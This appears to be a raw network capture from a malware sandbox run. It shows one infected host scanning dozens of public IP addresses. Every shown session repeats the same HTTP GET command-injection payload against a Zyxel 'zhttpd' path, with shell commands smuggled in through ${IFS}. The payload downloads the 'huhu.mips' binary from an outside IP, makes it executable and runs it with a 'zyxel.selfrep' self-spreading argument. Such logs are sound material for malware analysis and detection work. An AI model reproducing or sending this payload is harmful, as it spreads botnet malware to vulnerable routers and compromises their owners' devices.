                                            Feb 2, 2024 06:21:12.617194891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4314192.168.2.1557094207.62.51.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617245913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4315192.168.2.1552542188.104.181.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617258072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4316192.168.2.1535062124.0.10.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617295027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4317192.168.2.1548858218.104.58.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617353916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4318192.168.2.1549618138.102.201.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617381096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4319192.168.2.1555980158.233.202.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617413044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4320192.168.2.1539580192.71.217.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617449045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4321192.168.2.1537148156.104.191.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617491007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4322192.168.2.1549302197.173.216.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617517948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4323192.168.2.1546922160.160.85.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617563009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4324192.168.2.1538400114.249.114.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617597103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4325192.168.2.1560954218.242.176.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617640972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4326192.168.2.153650873.111.147.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617677927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4327192.168.2.1538552124.137.56.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617703915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4328192.168.2.1552096140.135.135.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617733955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4329192.168.2.1534682146.220.155.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617769003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4330192.168.2.153469432.10.212.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617806911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4331192.168.2.1545020171.212.69.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617844105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4332192.168.2.154445879.240.67.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617897034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4333192.168.2.1537434164.35.238.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617922068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4334192.168.2.154247476.39.81.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617978096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4335192.168.2.1534636138.108.125.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617988110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4336192.168.2.1543346159.34.9.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618006945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4337192.168.2.1560754206.6.243.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618048906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4338192.168.2.1534928208.41.212.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618107080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4339192.168.2.154713647.99.206.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618136883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4340192.168.2.155005241.97.254.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618175030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4341192.168.2.153658871.135.249.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618204117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4342192.168.2.1535796159.35.66.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618227959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4343192.168.2.1546006135.149.127.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618248940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4344192.168.2.1535106168.134.14.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618292093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4345192.168.2.1533772104.222.102.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618330002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4346192.168.2.1548408142.25.237.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618366003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4347192.168.2.155105019.198.22.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618386984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4348192.168.2.1541614193.148.34.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618422031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4349192.168.2.154063450.154.164.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618488073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4350192.168.2.1558362211.148.72.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618494034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4351192.168.2.154908061.5.72.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618532896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4352192.168.2.155186698.178.209.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618565083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4353192.168.2.1546742153.32.236.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618606091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4354192.168.2.155336085.254.161.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618633986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4355192.168.2.154632260.167.190.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618690968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4356192.168.2.1539988103.55.253.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618738890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4357192.168.2.1535098151.174.144.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618769884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4358192.168.2.153497666.32.162.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618803978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4359192.168.2.1536684202.211.138.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618829012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4360192.168.2.1534752190.127.210.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618880033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4361192.168.2.1534880182.145.203.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618906021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4362192.168.2.155821891.16.215.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618957043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4363192.168.2.154616288.172.28.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.618992090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4364192.168.2.154974897.30.93.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.619007111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4365192.168.2.1545582171.0.159.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.619055986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4366192.168.2.153819814.98.105.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.619088888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4367192.168.2.154601671.237.36.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.619124889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4368192.168.2.155162686.39.126.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.619158983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4369192.168.2.1548874125.234.63.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.619194031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4370192.168.2.1544162172.70.110.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.619239092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4371192.168.2.155252289.95.131.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.619281054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4372192.168.2.1551326163.229.83.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.619327068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4373192.168.2.1535630159.138.16.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.619359970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4374192.168.2.1542932196.255.213.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.619393110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4375192.168.2.1545998148.43.82.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.619435072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4376192.168.2.153508227.108.211.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.619471073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4377192.168.2.1544244205.167.119.194443
                                            TimestampBytes transferredDirectionData
